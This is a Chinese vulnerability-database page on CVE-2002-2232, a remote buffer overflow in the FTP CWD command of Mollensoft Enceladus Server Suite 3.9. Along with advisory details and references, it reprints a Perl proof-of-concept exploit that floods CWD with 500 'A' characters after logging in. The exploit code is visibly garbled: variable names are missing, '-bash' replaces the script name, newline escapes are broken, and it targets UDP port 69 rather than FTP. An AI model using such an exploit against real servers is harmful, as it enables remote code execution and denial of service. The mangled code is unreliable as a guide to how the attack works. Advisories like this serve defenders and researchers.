Mollensoft软件Enceladus服务器套件FTP命令缓冲区溢出漏洞

Mollensoft软件Enceladus服务器套件FTP命令缓冲区溢出漏洞

漏洞ID 1107125 漏洞类型 缓冲区溢出
发布时间 2002-12-09 更新时间 2002-12-31
图片[1]-Mollensoft软件Enceladus服务器套件FTP命令缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-2232
图片[2]-Mollensoft软件Enceladus服务器套件FTP命令缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200212-081
漏洞平台 Windows CVSS评分 8.5
|漏洞来源
https://www.exploit-db.com/exploits/22081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-081
|漏洞详情
Enceladus服务器套件3.9版本存在漏洞。因此远程攻击者可以借助超长CD(CWD)命令执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6345/info

Enceladus Server Suite is prone to a remotely exploitable buffer overflow vulnerability. It is possible to trigger this condition by supplying an overly long value for several FTP commands. To exploit this issue, the attacker must be able to authenticate to the FTP server included in Enceladus and issue a maliciously crafted command.

Successful exploitation will enable a remote attacker to execute arbitrary code with the privileges of the Enceladus Server Suite software, which will most likely run with SYSTEM (or equivalent) privileges. This vulnerability may also be used to cause a denial of service.

This issue has been reported for Enceladus Server Suite 3.9. Other versions may also be affected.


#!/usr/bin/perl -w



use IO::Socket;



 = "Mollensoft Software Enceladus Server Suite 3.9";



unless (@ARGV == 3) {

 print "n By Sapient2003n";

 die "usage: -bash <host to exploit> <user> <password>n";

}

print "n By Sapient2003n";



 = "A" x 500;

 = "USER [1]nPASS [2]nCWD ";



 = IO::Socket::INET->new(

        PeerAddr => [0],

        PeerPort => 69,

        Proto    => "udp",

) or die "Can't find host [0]n";

print  ;

print "Attempted to exploit [0]n";

close();
|参考资料

来源:BID
名称:6345
链接:http://www.securityfocus.com/bid/6345
来源:BUGTRAQ
名称:20021219MultiplevulnerabilityinEnceladusServer
链接:http://www.securityfocus.com/archive/1/303990
来源:XF
名称:enceladus-cd-bo(10802)
链接:http://www.iss.net/security_center/static/10802.php
来源:VULNWATCH
名称:20021209[SecurityOffice]EnceladusServerSuitev3.9BufferOverflowVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0097.html
来源:BUGTRAQ
名称:20021209[SecurityOffice]EnceladusServerSuitev3.9BufferOverflowVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0074.html

相关推荐: NetcPlus SmartServer 3.5.1 – SMTP Buffer Overflow

NetcPlus SmartServer 3.5.1 – SMTP Buffer Overflow 漏洞ID 1053414 漏洞类型 发布时间 1999-09-13 更新时间 1999-09-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Wi…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享